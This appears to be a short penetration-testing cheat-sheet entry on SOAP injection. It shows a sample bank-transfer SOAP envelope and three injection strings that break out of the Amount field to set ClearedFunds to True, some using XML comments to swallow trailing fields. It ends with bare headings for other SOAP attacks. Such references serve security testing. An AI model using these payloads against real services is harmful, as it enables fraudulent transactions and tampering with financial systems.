Skip to content

SOAP

SOAP

Example SOAP:

<soap:Envelope xmlns:soap=”http://www.w3.org/2001/12/soap-envelope”>
	<soap:Body>
		<pre:Add xmlns:pre=http://target/lists soap:encodingStyle=
		“http://www.w3.org/2001/12/soap-encoding”>
			<Account>
				<FromAccount>18281008</FromAccount>
				<Amount>1430</Amount>
				<ClearedFunds>False</ClearedFunds>
				<ToAccount>08447656</ToAccount>
			</Account>
		</pre:Add>
	</soap:Body>
</soap:Envelope>

Example Injections:

FromAccount=18281008&Amount=1430</Amount><ClearedFunds>True</ClearedFunds><Amount>1430&ToAccount=08447656&Submit=Submit
FromAccount=18281008&Amount=1430</Amount><ClearedFunds>True</ClearedFunds><ToAccount><!--&ToAccount=-->08447656&Submit=Submit
FromAccount=18281008&Amount=1430</Amount><ClearedFunds>True</ClearedFunds><ToAccount>08447656</ToAccount></Account></pre:Add></soap:Body></soap:Envelope><!--&Submit=Submit

Signature Wrapping

DoS

Redirect Reference

WS-Addressing spoofing